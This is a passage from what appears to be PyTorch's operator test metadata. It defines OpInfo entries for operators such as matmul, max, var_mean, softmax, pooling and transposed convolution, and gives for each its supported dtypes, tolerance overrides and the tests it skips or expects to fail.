'TestCompositeCompliance', 'test_backward'), # times out DecorateInfo(unittest.skip('Skipped!'), 'TestCudaFuserOpInfo', 'test_nvfuser_extremal_values'), ), supports_out=False, ), OpInfo('matmul', aliases=('linalg.matmul',), dtypes=all_types_and_complex_and(torch.bfloat16), dtypesIfCUDA=floating_and_complex_types_and(torch.float16, *[torch.bfloat16] if (SM53OrLater and CUDA11OrLater) or TEST_WITH_ROCM else []), assert_autodiffed=True, assert_jit_shape_analysis=True, supports_forward_ad=True, supports_fwgrad_bwgrad=True, check_batched_forward_grad=False, sample_inputs_func=sample_inputs_matmul, decorators=[ # NVIDIA only assures that bfloat16 is supported by bmm if SM >= 5.3 DecorateInfo(unittest.skip("Skipped!"), 'TestCommon', 'test_dtypes', device_type='cuda', active_if=not SM53OrLater), # ROCm intermittently fails the test with standard atol/rtol DecorateInfo(toleranceOverride({torch.float32: tol(atol=1e-4, rtol=0)}), 'TestCommon', 'test_noncontiguous_samples', device_type='cuda', active_if=TEST_WITH_ROCM), DecorateInfo(toleranceOverride({torch.float32: tol(atol=1e-4, rtol=0)}), 'TestCommon', 'test_out', device_type='cuda', active_if=TEST_WITH_ROCM), # mv for the sample with shapes (S, S, M, M), (M,) has some variance in the # backward on CPU DecorateInfo(toleranceOverride({torch.float32: tol(atol=0, rtol=1e-5)}), 'TestCommon', 'test_noncontiguous_samples', device_type='cpu'), ], skips=( # https://github.com/pytorch/pytorch/issues/67470 DecorateInfo(unittest.skip("67470!"), 'TestCommon', 'test_noncontiguous_samples', device_type='cpu', dtypes=(torch.long,)), # AssertionError: False is not true : Tensors failed to compare as equal! DecorateInfo(unittest.skip("Skipped!"), 'TestOpInfo', device_type='xla', dtypes=(torch.long,)), # https://github.com/pytorch/pytorch/issues/71774 DecorateInfo(unittest.skip('Skipped!'), 'TestNNCOpInfo', 'test_nnc_correctness', device_type='cpu', dtypes=(torch.long,)), )), OpInfo('max', variant_test_name='reduction_with_dim', dtypes=all_types_and(torch.float16, torch.bfloat16, torch.bool), sample_inputs_func=sample_inputs_max_min_reduction_with_dim, supports_fwgrad_bwgrad=True, supports_forward_ad=True), OpInfo('max', variant_test_name='reduction_no_dim', dtypes=all_types_and(torch.float16, torch.bfloat16, torch.bool), supports_out=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, sample_inputs_func=sample_inputs_max_min_reduction_no_dim), OpInfo('median', dtypes=all_types_and(torch.bfloat16), dtypesIfCUDA=all_types_and(torch.float16), # TODO: some signatures of median do support out supports_out=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, sample_inputs_func=partial(sample_inputs_reduction, supports_multiple_dims=False)), OpInfo('nanmedian', dtypes=all_types_and(torch.bfloat16), dtypesIfCUDA=all_types_and(torch.float16), # TODO: some signatures of nanmedian do support out supports_out=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, sample_inputs_func=partial(sample_inputs_reduction, supports_multiple_dims=False)), OpInfo('var_mean', dtypes=floating_and_complex_types_and(torch.half, torch.bfloat16), dtypesIfCUDA=floating_and_complex_types_and(torch.half, torch.bfloat16), sample_inputs_func=partial(sample_inputs_reduction, supports_multiple_dims=False), backward_dtypes=floating_types_and(torch.half, torch.bfloat16), backward_dtypesIfCUDA=floating_types_and(torch.half), # TODO: some signatures of var_mean do support out supports_out=False, supports_forward_ad=True, supports_fwgrad_bwgrad=False, # Need: var_mean skips=( # var_mean does not support automatic differentiation for outputs with complex dtype DecorateInfo(unittest.expectedFailure, 'TestCommon', 'test_dtypes'), # https://github.com/pytorch/pytorch/issues/67539 DecorateInfo(unittest.skip("67539"), 'TestCommon', 'test_noncontiguous_samples', active_if=TEST_WITH_ASAN, device_type='cpu'), # TODO: FIXME: complex inputs requiring grad error in forward DecorateInfo(unittest.skip("Skipped!"), 'TestCommon', 'test_dtypes'), # TODO: review with var_mean tests in test_autograd.py DecorateInfo(unittest.skip("Skipped!"), 'TestJit', 'test_variant_consistency_jit'), DecorateInfo(unittest.skip("Skipped!"), 'TestGradients', 'test_fn_grad'), DecorateInfo(unittest.skip("Skipped!"), 'TestGradients', 'test_fn_gradgrad'), DecorateInfo(unittest.skip("Fails on ASAN!"), 'TestCompositeCompliance', 'test_backward'), DecorateInfo(unittest.expectedFailure, 'TestCompositeCompliance', 'test_forward_ad'), DecorateInfo(unittest.skip("Skipped!"), 'TestGradients', 'test_forward_mode_AD'), # Division by zero, may be related to above? DecorateInfo(unittest.skip("Skipped!"), 'TestGradients', 'test_fn_fwgrad_bwgrad'))), OpInfo('std_mean', dtypes=floating_and_complex_types_and(torch.half, torch.bfloat16), dtypesIfCUDA=floating_and_complex_types_and(torch.half, torch.bfloat16), sample_inputs_func=partial(sample_inputs_reduction, supports_multiple_dims=False), backward_dtypes=floating_types_and(torch.half, torch.bfloat16), backward_dtypesIfCUDA=floating_types_and(torch.half), # TODO: some signatures of std_mean do support out supports_out=False, supports_forward_ad=True, # Supports only certain variants? supports_fwgrad_bwgrad=False, # Need: std_mean skips=( DecorateInfo(unittest.skip("ASAN: division by zero!"), active_if=TEST_WITH_ASAN), # std_mean does not support forward when complex inputs require grad DecorateInfo(unittest.expectedFailure, 'TestCommon', 'test_dtypes'), # https://github.com/pytorch/pytorch/issues/67539 DecorateInfo(unittest.skip("67539"), 'TestCommon', 'test_noncontiguous_samples', active_if=TEST_WITH_ASAN, device_type='cpu'), # TODO: fix along with var_mean autograd tests DecorateInfo(unittest.skip("Skipped!"), 'TestJit', 'test_variant_consistency_jit'), DecorateInfo(unittest.skip("Skipped!"), 'TestGradients', 'test_fn_grad'), DecorateInfo(unittest.skip("Skipped!"), 'TestGradients', 'test_fn_gradgrad'), DecorateInfo(unittest.skip("Fails on ASAN!"), 'TestCompositeCompliance', 'test_backward'), DecorateInfo(unittest.expectedFailure, 'TestCompositeCompliance', 'test_forward_ad'), DecorateInfo(unittest.skip("Skipped!"), 'TestGradients', 'test_forward_mode_AD'), # Division by zero, may be related to above? DecorateInfo(unittest.skip("Skipped!"), 'TestGradients', 'test_fn_fwgrad_bwgrad'))), OpInfo('meshgrid', variant_test_name='variadic_tensors', ref=np.meshgrid, dtypes=all_types_and_complex_and(torch.bfloat16, torch.bool, torch.float16), sample_inputs_func=partial(sample_inputs_meshgrid, variant='variadic'), skips=[ # JIT does not support variadic tensors. # RuntimeError: input->type()->kind() == TypeKind::OptionalType # INTERNAL ASSERT FAILED at "../torch/csrc/jit/passes/utils/check_alias_annotation.cpp":252, # please report a bug to PyTorch. DecorateInfo(unittest.skip("Skipped!"), 'TestJit', 'test_variant_consistency_jit'), # meshgrid is defined in torch.functional to take a # variadic list of tensors. Variadic parameters are not # compatible with the normalize operator tests. DecorateInfo(unittest.skip("Skipped!"), 'TestNormalizeOperators', 'test_normalize_operator_exhaustive'), # Skip operator schema test because this is a functional and not an operator DecorateInfo(unittest.skip("Skipped!"), 'TestOperatorSignatures', 'test_get_torch_func_signature_exhaustive'), ], supports_out=False, supports_fwgrad_bwgrad=True, supports_forward_ad=True), OpInfo('meshgrid', variant_test_name='list_of_tensors', # Unlike the variant above, we do not use np.meshgrid as a # ref since it does not officially support list of numpy # arrays. dtypes=all_types_and_complex_and(torch.bfloat16, torch.bool, torch.float16), sample_inputs_func=partial(sample_inputs_meshgrid, variant='list'), skips=[ # meshgrid is defined in torch.functional to take a # variadic list of tensors. Variadic parameters are not # compatible with the normalize operator tests. DecorateInfo(unittest.expectedFailure, 'TestNormalizeOperators', 'test_normalize_operator_exhaustive'), ], assert_autodiffed=True, supports_out=False, autodiff_nonfusible_nodes=[], supports_fwgrad_bwgrad=True, supports_forward_ad=True), OpInfo('min', variant_test_name='reduction_with_dim', dtypes=all_types_and(torch.float16, torch.bfloat16, torch.bool), sample_inputs_func=sample_inputs_max_min_reduction_with_dim, supports_fwgrad_bwgrad=True, supports_forward_ad=True), OpInfo('min', variant_test_name='reduction_no_dim', dtypes=all_types_and(torch.float16, torch.bfloat16, torch.bool), supports_out=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, sample_inputs_func=sample_inputs_max_min_reduction_no_dim), OpInfo('quantile', dtypes=floating_types(), sample_inputs_func=sample_inputs_reduction_quantile, supports_forward_ad=True, supports_fwgrad_bwgrad=True, skips=( DecorateInfo(unittest.expectedFailure, 'TestCompositeCompliance', 'test_forward_ad'), DecorateInfo(unittest.skip('Skipped!'), 'TestCudaFuserOpInfo', 'test_nvfuser_extremal_values'), ), # See https://github.com/pytorch/pytorch/issues/66357 # Relies on copy_ to broadcast, but the forward AD path calls broadcast_to which # does not have a batching rule in core check_batched_forward_grad=False), OpInfo('nanquantile', dtypes=floating_types(), sample_inputs_func=sample_inputs_reduction_quantile, supports_forward_ad=True, supports_fwgrad_bwgrad=True, skips=( DecorateInfo(unittest.expectedFailure, 'TestCompositeCompliance', 'test_forward_ad'), DecorateInfo(unittest.skip('Skipped!'), 'TestCudaFuserOpInfo', 'test_nvfuser_extremal_values'), ), # See https://github.com/pytorch/pytorch/issues/66357 # Relies on copy_ to broadcast, but the forward AD path calls broadcast_to which # does not have a batching rule in core check_batched_forward_grad=False), BinaryUfuncInfo( 'max', aliases=('maximum',), variant_test_name='binary', dtypes=all_types_and(torch.float16, torch.bfloat16, torch.bool), supports_forward_ad=True, supports_fwgrad_bwgrad=True, assert_autodiffed=True, ref=np.maximum, supports_rhs_python_scalar=False, skips=( # Incorrectly attempts to use a scalar for the second argument DecorateInfo(unittest.expectedFailure, 'TestJit', 'test_jit_alias_remapping'), # TODO: FIXME: RuntimeError: "max_elementwise_cuda" not implemented for 'ComplexFloat' DecorateInfo(unittest.expectedFailure, 'TestBinaryUfuncs', 'test_type_promotion', device_type='cuda'), )), BinaryUfuncInfo( 'maximum', dtypes=all_types_and(torch.float16, torch.bfloat16, torch.bool), supports_forward_ad=True, supports_fwgrad_bwgrad=True, ref=np.maximum, supports_rhs_python_scalar=False, skips=( # TODO: FIXME: RuntimeError: "max_elementwise_cuda" not implemented for 'ComplexFloat' DecorateInfo(unittest.expectedFailure, 'TestBinaryUfuncs', 'test_type_promotion', device_type='cuda'), )), BinaryUfuncInfo( 'min', aliases=('minimum',), variant_test_name='binary', dtypes=all_types_and(torch.float16, torch.bfloat16, torch.bool), supports_forward_ad=True, supports_fwgrad_bwgrad=True, assert_autodiffed=True, ref=np.minimum, supports_rhs_python_scalar=False, skips=( # Incorrectly attempts to use a scalar for the second argument DecorateInfo(unittest.expectedFailure, 'TestJit', 'test_jit_alias_remapping'), # TODO: FIXME: RuntimeError: "min_elementwise_cuda" not implemented for 'ComplexFloat' DecorateInfo(unittest.expectedFailure, 'TestBinaryUfuncs', 'test_type_promotion', device_type='cuda'), )), BinaryUfuncInfo( 'minimum', dtypes=all_types_and(torch.float16, torch.bfloat16, torch.bool), supports_forward_ad=True, supports_fwgrad_bwgrad=True, ref=np.minimum, supports_rhs_python_scalar=False, skips=( # TODO: FIXME: RuntimeError: "min_elementwise_cuda" not implemented for 'ComplexFloat' DecorateInfo(unittest.expectedFailure, 'TestBinaryUfuncs', 'test_type_promotion', device_type='cuda'), ), ), BinaryUfuncInfo('logical_and', ref=np.logical_and, dtypes=all_types_and_complex_and(torch.bool, torch.half, torch.bfloat16), supports_autograd=False, always_returns_bool=True, supports_rhs_python_scalar=False), BinaryUfuncInfo('logical_or', ref=np.logical_or, dtypes=all_types_and_complex_and(torch.bool, torch.half, torch.bfloat16), supports_autograd=False, always_returns_bool=True, supports_rhs_python_scalar=False), BinaryUfuncInfo('logical_xor', ref=np.logical_xor, dtypes=all_types_and_complex_and(torch.bool, torch.half, torch.bfloat16), supports_autograd=False, always_returns_bool=True, supports_rhs_python_scalar=False), BinaryUfuncInfo('bitwise_and', ref=np.bitwise_and, dtypes=integral_types_and(torch.bool), operator_variant=operator.and_, inplace_operator_variant=operator.iand, supports_autograd=False, supports_one_python_scalar=True, skips=( # RuntimeError: "bitwise_and_cuda" not implemented for 'Half' DecorateInfo(unittest.expectedFailure, 'TestBinaryUfuncs', 'test_type_promotion', device_type='cuda'), )), BinaryUfuncInfo('bitwise_or', ref=np.bitwise_or, dtypes=integral_types_and(torch.bool), operator_variant=operator.or_, inplace_operator_variant=operator.ior, supports_autograd=False, supports_one_python_scalar=True, skips=( # TODO: FIXME: RuntimeError: "bitwise_or_cuda" not implemented for 'Half' DecorateInfo(unittest.expectedFailure, 'TestBinaryUfuncs', 'test_type_promotion', device_type='cuda'), )), BinaryUfuncInfo('bitwise_xor', ref=np.bitwise_xor, dtypes=integral_types_and(torch.bool), operator_variant=operator.xor, inplace_operator_variant=operator.ixor, supports_autograd=False, supports_one_python_scalar=True, skips=( # TODO: FIXME: RuntimeError: "bitwise_xor_cuda" not implemented for 'Half' DecorateInfo(unittest.expectedFailure, 'TestBinaryUfuncs', 'test_type_promotion', device_type='cuda'), )), BinaryUfuncInfo('heaviside', ref=lambda a, b: ( # necessary because np.heaviside incorrectly returns float64 when passed args of dtype int64 np.int64(np.heaviside(a, b)) if a.dtype == np.int64 and b.dtype == np.int64 else np.heaviside(a, b) ), dtypes=all_types_and(torch.bool, torch.float16, torch.bfloat16), supports_autograd=False, supports_rhs_python_scalar=False, skips=( # RuntimeError: heaviside is not yet implemented for tensors with different dtypes. DecorateInfo(unittest.expectedFailure, 'TestBinaryUfuncs', 'test_type_promotion'), # PyTorch's heaviside does not appear to propagate NaNs DecorateInfo(unittest.skip("Skipped!"), 'TestBinaryUfuncs', 'test_reference_numerics_extremal_values'), )), BinaryUfuncInfo('lcm', ref=np.lcm, dtypes=integral_types_and(), supports_autograd=False, supports_rhs_python_scalar=False), BinaryUfuncInfo('gcd', ref=np.gcd, dtypes=integral_types_and(), supports_autograd=False, supports_rhs_python_scalar=False, skips=( DecorateInfo(unittest.expectedFailure, 'TestBinaryUfuncs', 'test_reference_numerics_small_values', dtypes=(torch.int8,)),)), BinaryUfuncInfo('isclose', ref=np.isclose, dtypes=all_types_and_complex_and(torch.bool, torch.float16, torch.bfloat16), sample_inputs_func=sample_inputs_isclose, supports_autograd=False, supports_out=False, supports_rhs_python_scalar=False, skips=( DecorateInfo(unittest.expectedFailure, 'TestCommon', 'test_numpy_refs', dtypes=(torch.complex128,)), # RuntimeError: Short did not match Int DecorateInfo(unittest.expectedFailure, 'TestBinaryUfuncs', 'test_type_promotion'), DecorateInfo(unittest.skip("Skipped!"), 'TestBinaryUfuncs', 'test_reference_numerics_extremal_values'), # Problem due to internal inplace operations DecorateInfo(unittest.expectedFailure, 'TestCompositeCompliance', 'test_operator'), )), # `softmax` supports different dtypes based on whether `dtype` argument, # is passed or not. Hence two OpInfo entries, one with dtype and other without. # https://github.com/pytorch/pytorch/issues/68752 OpInfo('softmax', aliases=('special.softmax', 'nn.functional.softmax',), aten_name='softmax', aten_backward_name='_softmax_backward_data', dtypes=floating_types_and(torch.bfloat16), dtypesIfCUDA=floating_types_and(torch.half, torch.bfloat16), sample_inputs_func=sample_inputs_softmax_variant, assert_jit_shape_analysis=True, assert_autodiffed=True, supports_forward_ad=True, supports_out=True), OpInfo('softmax', aliases=('special.softmax', 'nn.functional.softmax',), variant_test_name="with_dtype", aten_name='softmax', dtypes=all_types_and_complex_and(torch.bool, torch.float16, torch.bfloat16), sample_inputs_func=partial(sample_inputs_softmax_variant, with_dtype=True), assert_autodiffed=True, supports_forward_ad=True, supports_out=True), # `softmin` supports different dtypes based on whether `dtype` argument, # is passed or not. Hence two OpInfo entries, one with dtype and other without. # https://github.com/pytorch/pytorch/issues/68752 OpInfo('nn.functional.softmin', aten_name='softmin', dtypes=floating_types_and(torch.bfloat16), dtypesIfCUDA=floating_types_and(torch.half, torch.bfloat16), sample_inputs_func=sample_inputs_softmax_variant, assert_jit_shape_analysis=False, assert_autodiffed=False, supports_forward_ad=True, supports_out=False), OpInfo('nn.functional.softmin', variant_test_name="with_dtype", aten_name='softmin', dtypes=all_types_and_complex_and(torch.float16, torch.bfloat16), sample_inputs_func=partial(sample_inputs_softmax_variant, with_dtype=True), assert_autodiffed=False, supports_forward_ad=True, supports_out=False), OpInfo( "nn.functional.cross_entropy", dtypes=floating_types_and(torch.bfloat16), dtypesIfCUDA=floating_types_and(torch.float16, torch.bfloat16), sample_inputs_func=sample_inputs_cross_entropy, supports_out=False, supports_forward_ad=True, decorators=( DecorateInfo( toleranceOverride({torch.float32: tol(atol=1e-5, rtol=1e-3)}), "TestJit", "test_variant_consistency_jit", device_type="cpu", ), ), skips=( # AssertionError: False is not true : Scalars failed to compare as equal! 0 != 1536 # test_ops.TestJitCUDA.test_variant_consistency_jit_nn_functional_cross_entropy_cuda_float32 leaked # 1536 bytes CUDA memory on device 0 DecorateInfo( unittest.expectedFailure, "TestJit", "test_variant_consistency_jit", device_type="cuda", ), ) ), OpInfo('nn.functional.normalize', dtypes=floating_and_complex_types_and(torch.bfloat16), dtypesIfCUDA=floating_and_complex_types_and(torch.half, torch.bfloat16), sample_inputs_func=sample_inputs_normalize, supports_forward_ad=True, supports_fwgrad_bwgrad=True, skips=( DecorateInfo(unittest.expectedFailure, 'TestGradients', 'test_fn_fwgrad_bwgrad', dtypes=[torch.complex128]), )), OpInfo('aminmax', ref=lambda x, dim=None, keepdim=False: (np.amin(x, axis=dim, keepdims=keepdim), np.amax(x, axis=dim, keepdims=keepdim)), dtypes=all_types_and(torch.bool), dtypesIfCUDA=all_types_and(torch.bool, torch.float16, torch.bfloat16), decorators=(onlyNativeDeviceTypes,), supports_autograd=False, sample_inputs_func=sample_inputs_aminmax, error_inputs_func=error_inputs_aminmax_amax_amin, skips=( # AssertionError: Resizing an out= argument with no elements threw a resize warning! DecorateInfo(unittest.expectedFailure, 'TestCommon', 'test_out', device_type='cpu'), )), OpInfo('as_strided', op=lambda x, size, stride, storage_offset=0: torch.as_strided(x, size, stride, storage_offset=storage_offset), dtypes=all_types_and_complex_and(torch.bool, torch.float16, torch.bfloat16, torch.chalf), supports_out=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, # vmap does not support inplace views check_inplace_batched_forward_grad=False, sample_inputs_func=sample_inputs_as_strided, skips=( # Note: This xfail is fine -- it's inherent to how as_strided works DecorateInfo(unittest.expectedFailure, 'TestCommon', 'test_noncontiguous_samples'), # AssertionError: False is not true : Scalars failed to compare as equal! DecorateInfo(unittest.skip("Errors when storage_offset is included"), 'TestCommon', 'test_variant_consistency_eager'), # RuntimeError: This operator is not Composite Compliant DecorateInfo(unittest.skip("Errors when storage_offset is included"), 'TestCompositeCompliance', 'test_backward'), DecorateInfo(unittest.skip("Errors when storage_offset is included"), 'TestCompositeCompliance', 'test_forward_ad'), # Not close DecorateInfo(unittest.skip("Errors when storage_offset is included"), 'TestCommon', 'test_complex_half_reference_testing'), # Not close DecorateInfo(unittest.skip("Errors when storage_offset is included"), 'TestMathBits', 'test_conj_view'), DecorateInfo(unittest.skip("Errors when storage_offset is included"), 'TestMathBits', 'test_neg_view'), DecorateInfo(unittest.skip("Numerous errors"), 'TestGradients'))), OpInfo('as_strided_scatter', op=lambda x, src, size, stride, storage_offset=0: torch.as_strided_scatter(x, src, size, stride, storage_offset=storage_offset), dtypes=all_types_and_complex_and(torch.bool, torch.float16, torch.bfloat16, torch.chalf), supports_out=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, # vmap does not support inplace views check_inplace_batched_forward_grad=False, sample_inputs_func=sample_inputs_as_strided_scatter, skips=( DecorateInfo(unittest.skip('Works only for CPU complex64'), 'TestMathBits', 'test_conj_view'), DecorateInfo(unittest.skip('Works for float64, fails for everything else'), 'TestMathBits', 'test_neg_view'), DecorateInfo(unittest.skip('Works for int64, fails for everything else'), 'TestCommon', 'test_noncontiguous_samples'), # noqa: B950 DecorateInfo(unittest.skip('Fails in most cases, passes on LAZY for some reason'), 'TestCommon', 'test_variant_consistency_eager'), # noqa: B950 DecorateInfo(unittest.skip('Only fails for LAZY, passes on everything else'), 'TestCompositeCompliance', 'test_backward'), # noqa: B950 DecorateInfo(unittest.skip('Passes on complex64 and float32 only'), 'TestJit', 'test_variant_consistency_jit'), DecorateInfo(unittest.skip('Fails on cuda + rocm'), 'TestCommon', 'test_complex_half_reference_testing'), DecorateInfo(unittest.expectedFailure, 'TestGradients', 'test_fn_grad'), DecorateInfo(unittest.expectedFailure, 'TestGradients', 'test_fn_gradgrad'), DecorateInfo(unittest.skip('Passes on complex128 and float64 only'), 'TestGradients', 'test_fn_fwgrad_bwgrad'),)), OpInfo('nn.functional.cosine_similarity', aten_name="cosine_similarity", dtypes=floating_types_and(torch.bfloat16), dtypesIfCUDA=floating_types_and(torch.float16, torch.bfloat16), supports_out=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, sample_inputs_func=sample_inputs_cosine_similarity), OpInfo('nn.functional.adaptive_avg_pool1d', dtypes=floating_types_and(torch.bfloat16), dtypesIfCUDA=floating_types_and(torch.half, torch.bfloat16), supports_out=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, gradcheck_nondet_tol=GRADCHECK_NONDET_TOL, sample_inputs_func=sample_inputs_adaptive_avg_pool1d), OpInfo('nn.functional.adaptive_avg_pool2d', dtypes=floating_types_and(torch.bfloat16), dtypesIfCUDA=floating_types_and(torch.half, torch.bfloat16), decorators=( # RuntimeError: # adaptive_avg_pool2d(Tensor input, int[2] output_size) -> (Tensor): # Expected a value of type 'List[int]' for argument 'output_size' but # instead found type 'Tuple[NoneType, int]'. : # File "<string>", line 3 # def the_method(i0): # return torch.nn.functional.adaptive_avg_pool2d(i0, (None, 7)) # ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ <--- HERE DecorateInfo(unittest.expectedFailure, 'TestJit', 'test_variant_consistency_jit'), ), supports_out=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, gradcheck_nondet_tol=GRADCHECK_NONDET_TOL, sample_inputs_func=sample_inputs_adaptive_avg_pool2d), OpInfo('nn.functional.adaptive_avg_pool3d', dtypes=floating_types_and(torch.half), dtypesIfCUDA=floating_types_and(torch.half, torch.bfloat16), decorators=( # RuntimeError: # adaptive_avg_pool3d(Tensor input, int[3] output_size) -> (Tensor): # Expected a value of type 'List[int]' for argument 'output_size' but # instead found type 'Tuple[NoneType, NoneType, NoneType]'. : # File "<string>", line 3 # # def the_method(i0): # return torch.nn.functional.adaptive_avg_pool3d(i0, (None, None, None)) # ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ <--- HERE # DecorateInfo(unittest.expectedFailure, 'TestJit', 'test_variant_consistency_jit'), ), supports_out=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, gradcheck_nondet_tol=GRADCHECK_NONDET_TOL, sample_inputs_func=sample_inputs_adaptive_avg_pool3d), OpInfo('nn.functional.adaptive_max_pool1d', dtypes=floating_types_and(torch.bfloat16), dtypesIfCUDA=floating_types_and(torch.half, torch.bfloat16), supports_out=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, # got: Batching rule not implemented for aten::flatten.using_ints check_batched_forward_grad=False, gradcheck_nondet_tol=GRADCHECK_NONDET_TOL, sample_inputs_func=sample_inputs_adaptive_max_pool1d), OpInfo('nn.functional.adaptive_max_pool2d', dtypes=floating_types_and(torch.bfloat16), dtypesIfCUDA=floating_types_and(torch.half, torch.bfloat16), decorators=( # RuntimeError: # adaptive_max_pool2d(Tensor input, int[2] output_size) -> (Tensor): # Expected a value of type 'List[int]' for argument 'output_size' but # instead found type 'Tuple[NoneType, int]'. : # File "<string>", line 3 # def the_method(i0): # return torch.nn.functional.adaptive_max_pool2d(i0, (None, 7)) # ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ <--- HERE DecorateInfo(unittest.expectedFailure, 'TestJit', 'test_variant_consistency_jit'), ), supports_out=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, # got: Batching rule not implemented for aten::flatten.using_ints check_batched_forward_grad=False, gradcheck_nondet_tol=GRADCHECK_NONDET_TOL, sample_inputs_func=sample_inputs_adaptive_max_pool2d), OpInfo('nn.functional.adaptive_max_pool3d', dtypes=floating_types(), dtypesIfCUDA=floating_types_and(torch.half, torch.bfloat16), decorators=( # RuntimeError: # adaptive_max_pool3d(Tensor input, int[3] output_size) -> (Tensor): # Expected a value of type 'List[int]' for argument 'output_size' but # instead found type 'Tuple[NoneType, NoneType, NoneType]'. : # File "<string>", line 3 # # def the_method(i0): # return torch.nn.functional.adaptive_max_pool3d(i0, (None, None, None)) # ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ <--- HERE # DecorateInfo(unittest.expectedFailure, 'TestJit', 'test_variant_consistency_jit'), ), supports_out=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, # got: Batching rule not implemented for aten::flatten.using_ints check_batched_forward_grad=False, gradcheck_nondet_tol=GRADCHECK_NONDET_TOL, sample_inputs_func=sample_inputs_adaptive_max_pool3d), OpInfo('nn.functional.avg_pool1d', aten_name='avg_pool1d', supports_autograd=True, supports_out=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, dtypes=floating_types_and(torch.int64, torch.bfloat16), dtypesIfCUDA=floating_types_and(torch.float16, torch.bfloat16), gradcheck_nondet_tol=GRADCHECK_NONDET_TOL, sample_inputs_func=sample_inputs_avgpool1d), OpInfo('nn.functional.avg_pool3d', aten_name='avg_pool3d', supports_autograd=True, supports_forward_ad=True, supports_fwgrad_bwgrad=True, dtypes=floating_types_and(torch.int64), dtypesIfCUDA=floating_types_and(torch.float16, torch.bfloat16), gradcheck_nondet_tol=GRADCHECK_NONDET_TOL, sample_inputs_func=sample_inputs_avgpool3d, skips=( # AssertionError: Tensor-likes are not close! DecorateInfo(unittest.expectedFailure, 'TestCommon', 'test_out', device_type='cpu'), )), OpInfo( "nn.functional.binary_cross_entropy_with_logits", aten_name="binary_cross_entropy_with_logits", supports_autograd=True, supports_forward_ad=True, supports_fwgrad_bwgrad=True, supports_out=False, dtypes=floating_types_and(torch.bfloat16), dtypesIfCUDA=floating_types_and(torch.float16, torch.bfloat16), gradcheck_nondet_tol=GRADCHECK_NONDET_TOL, sample_inputs_func=sample_inputs_binary_cross_entropy_with_logits, skips=( DecorateInfo( unittest.skip("Skipped!"), 'TestJit', 'test_variant_consistency_jit', dtypes=(torch.float32,) ), DecorateInfo(unittest.skip("Skipped!"), 'TestGradients', "test_fn_gradgrad", dtypes=(torch.float64,)), DecorateInfo(unittest.skip("Skipped!"), 'TestGradients', "test_fn_fwgrad_bwgrad", dtypes=(torch.float64,)), ), ), UnaryUfuncInfo( 'nn.functional.relu', aten_name="relu", ref=lambda a: np.where(a <= 0, 0, a), supports_autograd=True, dtypes=all_types_and(torch.bfloat16), dtypesIfCUDA=all_types_and(torch.half, torch.bfloat16), sample_inputs_func=sample_inputs_nn_activation_relu, supports_out=False, supports_fwgrad_bwgrad=True, supports_forward_ad=True), OpInfo('nn.functional.conv_transpose1d', aten_name='conv_transpose1d', aliases=('conv_transpose1d',), dtypes=floating_types_and(torch.int64), dtypesIfCUDA=floating_types_and(torch.float16, *[torch.bfloat16] if (CUDA11OrLater or TEST_WITH_ROCM) else []), sample_inputs_func=sample_inputs_conv_transpose1d, supports_forward_ad=True, supports_fwgrad_bwgrad=True, gradcheck_nondet_tol=GRADCHECK_NONDET_TOL, decorators=[ DecorateInfo( toleranceOverride({torch.float32: tol(atol=1e-04, rtol=1.3e-06), }), 'TestCommon', 'test_variant_consistency_eager', device_type='cuda')], skips=( # RuntimeError: !lhs.isAliasOf(rhs)INTERNAL ASSERT FAILED at # "../torch/csrc/jit/passes/utils/check_alias_annotation.cpp":104, please report a bug to PyTorch. DecorateInfo(unittest.expectedFailure, 'TestJit', 'test_variant_consistency_jit'), ), supports_out=False,), OpInfo('nn.functional.conv_transpose2d', aten_name='conv_transpose2d', aliases=('conv_transpose2d',), dtypes=floating_types_and(torch.int64), dtypesIfCUDA=floating_types_and(torch.float16, *[torch.bfloat16] if (CUDA11OrLater or TEST_WITH_ROCM) else []), sample_inputs_func=sample_inputs_conv_transpose2d, supports_forward_ad=True, supports_fwgrad_bwgrad=True, gradcheck_nondet_tol=GRADCHECK_NONDET_TOL, decorators=[ DecorateInfo( toleranceOverride({torch.float32: tol(atol=1e-04, rtol=1.3e-06), }), 'TestCommon', 'test_variant_consistency_eager', device_type='cuda')], skips=( # RuntimeError: !lhs.isAliasOf(rhs)INTERNAL ASSERT FAILED at # "../torch/csrc/jit/passes/utils/check_alias_annotation.cpp":104, please report a bug to PyTorch. DecorateInfo(unittest.skip("Skipped!"), 'TestJit', 'test_variant_consistency_jit'), ), supports_out=False,), OpInfo('nn.functional.conv_transpose3d', aten_name='conv_transpose3d', aliases=('conv_transpose3d',), dtypes=floating_types_and(torch.int64), dtypesIfCUDA=floating_types_and(torch.float16, *[torch.bfloat16] if (CUDA11OrLater or TEST_WITH_ROCM) else []), sample_inputs_func=sample_inputs_conv_transpose3d, supports_forward_ad=True, supports_fwgrad_bwgrad=True, gradcheck_nondet_tol=GRADCHECK_NONDET_TOL, decorators=[ DecorateInfo( toleranceOverride({torch.float32: tol(atol=1e-04, rtol=1.3e-06), }), 'TestCommon', 'test_variant_consistency_eager', device_type='cuda'), DecorateInfo( toleranceOverride({torch.float32: tol(atol=1e-04, rtol=1.3e-06), }), 'TestCommon', 'test_noncontiguous_samples', device_type='cuda')], skips=( # RuntimeError: !lhs.isAliasOf(rhs)INTERNAL ASSERT FAILED at # "../torch/csrc/jit/passes/utils/check_alias_annotation.cpp":104, please report a bug to PyTorch. DecorateInfo(unittest.skip("Skipped!"), 'TestJit', 'test_variant_consistency_jit'), DecorateInfo(unittest.skip("Skipped! 75029"), 'TestCudaFuserOpInfo', 'test_nvfuser_correctness'), DecorateInfo(unittest.skip("Skipped! 